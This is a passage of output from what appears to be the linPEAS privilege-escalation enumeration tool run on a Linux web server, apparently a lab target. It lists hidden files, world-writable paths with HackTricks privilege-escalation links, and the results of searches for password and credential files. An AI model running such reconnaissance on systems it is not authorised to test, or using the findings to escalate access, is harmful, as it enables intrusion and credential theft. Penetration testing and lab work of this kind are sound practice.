permission ╔══════════╣ Web files?(output limit) /var/www/: total 28K drwxr-xr-x 7 www-data www-data 4.0K Feb 12 10:54 . drwxr-xr-x 14 root root 4.0K Jan 16 09:49 .. drwx------ 4 www-data www-data 4.0K Feb 12 10:43 .config drwx------ 3 www-data www-data 4.0K Feb 12 10:54 .gnupg drwxr-xr-x 3 www-data www-data 4.0K Jan 16 09:49 api drwxr-xr-x 2 root root 4.0K Jan 31 14:01 html drwxr-xr-x 3 www-data www-data 4.0K Jan 16 09:49 starting-page ╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-rw-r-- 1 root root 21858 Feb 8 12:48 /usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/Image/ExifTool/.packlist -rw-r--r-- 1 root root 0 Oct 14 2021 /usr/lib/node_modules/npm/.npmrc -rw-r--r-- 1 root root 3274 Nov 4 11:35 /usr/lib/node_modules/npm/.mailmap -rw-r--r-- 1 root root 245 Nov 4 11:35 /usr/lib/node_modules/npm/.licensee.json -rw-r--r-- 1 root root 126 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/lockfile/.travis.yml -rw-r--r-- 1 root root 54 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/through/.travis.yml -rw-r--r-- 1 root root 116 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/mkdirp/node_modules/minimist/.travis.yml -rw-r--r-- 1 root root 84 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/smart-buffer/.prettierrc.yaml -rw-r--r-- 1 root root 152 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/smart-buffer/.travis.yml -rw-r--r-- 1 root root 4770 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-regex/.travis.yml -rw-r--r-- 1 root root 4140 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-regex/.jscs.json -rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/builtins/.travis.yml -rw-r--r-- 1 root root 715 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/https-proxy-agent/.editorconfig -rw-r--r-- 1 root root 2935 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/https-proxy-agent/.eslintrc.js -rw-r--r-- 1 root root 58 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/sorted-union-stream/.travis.yml -rw-r--r-- 1 root root 113 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/getpass/.travis.yml -rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-iterate/node_modules/readable-stream/.travis.yml -rw-r--r-- 1 root root 60 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-iterate/.travis.yml -rw-r--r-- 1 root root 562 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fast-json-stable-stringify/.eslintrc.yml -rw-r--r-- 1 root root 108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fast-json-stable-stringify/.travis.yml -rw-r--r-- 1 root root 1160 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/color-name/.eslintrc.json -rw-r--r-- 1 root root 119 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/prr/.travis.yml -rw-r--r-- 1 root root 58 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/pumpify/node_modules/pump/.travis.yml -rw-r--r-- 1 root root 68 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/pumpify/.travis.yml -rw-r--r-- 1 root root 277 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/worker-farm/.editorconfig -rw-r--r-- 1 root root 127 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/worker-farm/.travis.yml -rw-r--r-- 1 root root 84 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/socks/.prettierrc.yaml -rw-r--r-- 1 root root 185 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/socks/.travis.yml -rw-r--r-- 1 root root 69 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/util-promisify/.travis.yml -rw-r--r-- 1 root root 334 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/retry/.travis.yml -rw-r--r-- 1 root root 286 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.editorconfig -rw-r--r-- 1 root root 13 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.eslintignore -rw-r--r-- 1 root root 8082 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.travis.yml -rw-r--r-- 1 root root 62 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-each/.travis.yml -rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/duplexify/node_modules/readable-stream/.travis.yml -rw-r--r-- 1 root root 65 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/duplexify/.travis.yml -rw-r--r-- 1 root root 59 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/JSONStream/.travis.yml -rw-r--r-- 1 root root 3817 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/node-gyp/.travis.yml -rw-r--r-- 1 root root 193 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/performance-now/.tm_properties -rw-r--r-- 1 root root 65 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/performance-now/.travis.yml -rw-r--r-- 1 root root 421 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fs-vacuum/.eslintrc -rw-r--r-- 1 root root 215 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fs-vacuum/.travis.yml -rw-r--r-- 1 root root 150 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/isstream/.travis.yml -rw-r--r-- 1 root root 134 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/mute-stream/.travis.yml -rw-r--r-- 1 root root 38 Oct 14 2021 /usr/lib/node_modules/npm/node_modules/qrcode-terminal/.travis.yml -rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmsearch/.travis.yml -rw-r--r-- 1 root root 189 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/sshpk/.travis.yml -rw-r--r-- 1 root root 276 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.editorconfig -rw-r--r-- 1 root root 6986 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.travis.yml -rw-r--r-- 1 root root 4108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.jscs.json -rw-r--r-- 1 root root 178 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/http-signature/.dir-locals.el -rw-r--r-- 1 root root 36 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/require-directory/.travis.yml -rw-r--r-- 1 root root 91 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/spec/.eslintrc.yml -rw-r--r-- 1 root root 630 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/.eslintrc.yml -rw-r--r-- 1 root root 108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/.travis.yml -rw-r--r-- 1 root root 439 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/ajv/.tonic_example.js -rw-r--r-- 1 root root 62 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/ajv/scripts/.eslintrc.yml -rw-r--r-- 1 root root 1151 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-date-object/.travis.yml -rw-r--r-- 1 root root 2878 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-date-object/.jscs.json -rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/isarray/.travis.yml -rw-r--r-- 1 root root 77 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/errno/.travis.yml -rw-r--r-- 1 root root 6 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/psl/.eslintignore -rw-r--r-- 1 root root 52 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/psl/.travis.yml -rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/typedarray/.travis.yml -rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmorg/.travis.yml -rw-r--r-- 1 root root 66 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/validate-npm-package-name/.travis.yml -rw-r--r-- 1 root root 43 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/archy/.travis.yml -rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/through2/node_modules/readable-stream/.travis.yml -rw-r--r-- 1 root root 309 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/agent-base/.travis.yml -rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmpublish/.travis.yml grep: write error: Broken pipe grep: write error: Broken pipe ╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) -rw-r--r-- 1 root root 32707 Jan 13 10:52 /var/backups/apt.extended_states.0 -rw-r--r-- 1 root root 3743 Nov 20 22:36 /var/backups/apt.extended_states.3.gz -rw-r--r-- 1 root root 3524 Jan 12 10:24 /var/backups/apt.extended_states.1.gz -rw-r--r-- 1 root root 3523 Jan 10 12:46 /var/backups/apt.extended_states.2.gz ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files /dev/mqueue /dev/shm /run/lock /run/php /run/screen /tmp /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory /var/cache/apache2/mod_cache_disk /var/crash /var/lib/lxcfs/cgroup/memory/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/auditd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cloud-init-local.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntux2dx2dvgx2dswap.swap/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/php7.4-fpm.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/starting-page.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2x2dpvscan.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control /var/lib/nginx/body /var/lib/nginx/fastcgi /var/lib/nginx/proxy /var/lib/nginx/scgi /var/lib/nginx/uwsgi /var/lib/php/sessions /var/tmp /var/www ╔══════════╣ Interesting GROUP writable files (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files ╔══════════╣ Searching passwords in history files treatment of @ARGV elements
  • Minor change to parsing of -@ argfile (comment lines may may no longer have
  • No longer trim trailing spaces from arguments in -@ argfiles
  • Added -password option for processing password-protected PDF documents
  • Added Password option
  • Improved -@ option to allow a UTF-8 BOM at the start of the input file
  • Changed -@ to insert arguments at the current position in the command line
  • Fixed bug introduced in 5.99 which broke the "-tagsFromFile @" feature
  • Fixed problem which generated warnings about symbol "@indent" in Nikon.pm expanded beyond its "Image" roots!)
  • Assume '-TagsFromFile @' for any redirected tags (eg. '-SRCTAG>DSTTAG' or
  • Ignore white space around '=' sign of arguments in '-@' file
  • Fixed problem with new '-tagsFromFile @' feature which occurred when
  • Allow target file to be specified by '@' with -TagsFromFile option
  • Added -@ option and two utility files (iptc2xmp.args and xmp2iptc.args) to ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /bin/systemd-ask-password /bin/systemd-tty-ask-password-agent /etc/pam.d/common-password /usr/lib/git-core/git-credential /usr/lib/git-core/git-credential-cache /usr/lib/git-core/git-credential-cache--daemon /usr/lib/git-core/git-credential-store #)There are more creds/passwds files in the previous parent folder /usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/node_modules/npm/lib/config/clear-credentials-by-uri.js /usr/lib/node_modules/npm/lib/config/get-credentials-by-uri.js /usr/lib/node_modules/npm/lib/config/set-credentials-by-uri.js /usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc /usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py /usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc /usr/lib/python3/dist-packages/twisted/cred/credentials.py /usr/share/dns/root.key /usr/share/doc/git/contrib/credential /usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c /usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c /usr/share/doc/git/contrib/credential/netrc/git-credential-netrc /usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c /usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c /usr/share/man/man1/git-credential-cache--daemon.1.gz /usr/share/man/man1/git-credential-cache.1.gz /usr/share/man/man1/git-credential-store.1.gz /usr/share/man/man1/git-credential.1.gz #)There are more creds/passwds files in the previous parent folder /usr/share/man/man7/gitcredentials.7.gz /usr/share/man/man8/systemd-ask-password-console.path.8.gz /usr/share/man/man8/systemd-ask-password-console.service.8.gz /usr/share/man/man8/systemd-ask-password-wall.path.8.gz /usr/share/man/man8/systemd-ask-password-wall.service.8.gz #)There are more creds/passwds files in the previous parent folder /usr/share/pam/common-password.md5sums /var/cache/debconf/passwords.dat /var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords /var/lib/pam/password /var/www/starting-page/blog/node_modules/caniuse-lite/data/features/credential-management.js /var/www/starting-page/blog/node_modules/caniuse-lite/data/features/passwordrules.js ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs